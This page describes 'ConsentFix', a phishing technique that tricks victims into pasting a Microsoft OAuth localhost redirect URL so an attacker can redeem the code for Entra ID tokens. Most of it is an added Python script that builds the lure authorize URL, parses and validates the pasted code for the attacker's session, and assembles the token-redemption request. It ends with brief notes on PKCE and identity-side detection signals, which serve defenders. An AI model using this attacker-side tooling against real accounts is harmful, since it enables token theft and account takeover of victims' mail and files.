Hackers Stole Your Account (for free)


ConsentFix is an emerging identity-based attack technique that abuses Microsoft's legitimate OAuth2 authorization code flow to steal tokens entirely within the browser, so it leaves nothing on the endpoint for EDR or antivirus to flag. Where a traditional ClickFix attack gets the victim to run a command on their own machine, ConsentFix has them sign in on the real Microsoft login page and then copy the resulting localhost redirect URL, which carries the authorization code, back to the attacker, who redeems it for access and refresh tokens to the victim's Entra ID environment. A detailed tutorial posted on the XSS cybercrime forum demonstrates the full attack chain using free tools (Pipedream, Cloudflare Workers, GoLogin and DocSend) and the post-exploitation it enables across Outlook, OneDrive, SharePoint and Teams. Dark web monitoring by Flare shows growing criminal interest in the technique since December 2024, suggesting it will spread much as ClickFix did.
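The three messages that make up the chain above, as an added example that is not part of the original page or the forum tutorial it describes: the authorize link the attacker sends, the localhost URL the victim is told to copy out of the address bar, and the token request the attacker sends with the extracted code. The client ID, port and sample pasted URL are placeholders I made up; a real lure reuses a Microsoft first-party public client that already has a localhost redirect URI registered, and the only network calls would be the victim's sign-in and the attacker's POST to the token endpoint, neither of which this script performs.

```python
from urllib.parse import parse_qs, urlencode, urlparse

AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/token"

# Hypothetical placeholder, not a real app ID. A real lure borrows a Microsoft
# first-party public client whose registration already allows http://localhost,
# so the attacker registers nothing and the victim sees no consent prompt.
CLIENT_ID = "00000000-0000-0000-0000-000000000000"
REDIRECT_URI = "http://localhost:54321"   # resolves on the victim's machine only
# offline_access is what turns the exchange into a refresh token, not just an
# access token; .default asks for everything the client is pre-authorised for.
SCOPE = "openid profile offline_access https://graph.microsoft.com/.default"


def build_lure_url(state: str) -> str:
    """Step 1: the link the attacker sends. It points at the genuine Microsoft
    login page, so nothing the victim sees is forged."""
    params = {
        "client_id": CLIENT_ID,
        "response_type": "code",
        "redirect_uri": REDIRECT_URI,
        "response_mode": "query",
        "scope": SCOPE,
        "state": state,
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


def extract_code(pasted_url: str, expected_state: str) -> str:
    """Step 2: after sign-in the browser is sent to http://localhost:54321/?code=...
    which fails to load (nothing listens there). The lure tells the victim that
    the 'fix' is to copy that address and paste it into a form. This parses the
    pasted text on the attacker's side and rejects anything that is not the
    redirect of the session the attacker started."""
    u = urlparse(pasted_url.strip())
    if u.scheme != "http" or u.hostname not in ("localhost", "127.0.0.1"):
        raise ValueError("not a localhost redirect")
    q = parse_qs(u.query)
    if "error" in q:
        raise ValueError(f"authorization failed: {q['error'][0]}")
    if q.get("state", [None])[0] != expected_state:
        raise ValueError("state mismatch: not the session we started")
    code = q.get("code", [None])[0]
    if not code:
        raise ValueError("no authorization code in pasted URL")
    return code


def build_token_request(code: str) -> dict:
    """Step 3: the attacker redeems the code. A public client sends no secret;
    the only binding the token endpoint checks is that redirect_uri matches the
    authorize request, and the attacker chose that value."""
    return {
        "client_id": CLIENT_ID,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": REDIRECT_URI,
        "scope": SCOPE,
    }


if __name__ == "__main__":
    state = "c0ffee"
    print("lure URL  :", build_lure_url(state))
    # Constructed sample of what a victim would paste back; not a real code.
    pasted = "http://localhost:54321/?code=0.AXkA-example-code&state=c0ffee&session_state=abc"
    code = extract_code(pasted, state)
    print("auth code :", code)
    print("POST", TOKEN_ENDPOINT, build_token_request(code))
```

PKCE does not help here: the attacker is the client that started the flow, so they hold the code_verifier. The code is short-lived and single-use, which is why the lure needs the victim to paste the URL promptly, and why a defender's best signals are on the identity side rather than the endpoint: a sign-in to a first-party desktop client followed by token use from an IP and user agent that never appear on the victim's managed device.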

14m watch time
